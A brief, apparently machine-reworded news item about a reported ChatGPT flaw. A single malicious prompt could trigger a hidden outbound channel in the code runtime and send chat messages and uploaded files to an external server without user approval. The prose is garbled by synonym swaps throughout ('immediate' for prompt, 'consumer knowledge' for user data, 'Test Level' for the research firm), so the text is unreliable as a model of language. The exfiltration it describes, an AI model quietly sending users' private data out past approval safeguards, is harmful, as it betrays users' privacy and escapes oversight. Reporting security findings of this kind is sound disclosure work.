ChatGPT’s hidden outbound channel leaks consumer knowledge
OpenAI has reportedly fastened a parallel bug in ChatGPT that goes past credential theft. Test Level researchers uncovered a hidden outbound communication path in ChatGPT’s code execution runtime that could possibly be triggered with a single malicious immediate.
This channel efficiently bypassed the platform’s anticipated safeguards round exterior knowledge sharing. As a substitute of requiring express consumer approval, the runtime might transmit knowledge, corresponding to chat messages, uploaded recordsdata, or generated outputs, to an exterior server with none seen alerts.
CheckPoint researchers demonstrated crafting a immediate that leverages this habits, permitting the runtime to package deal and transmit personal chat knowledge to an exterior server. Principally, a normal-looking dialog could possibly be become a covert knowledge exfiltration pipeline.



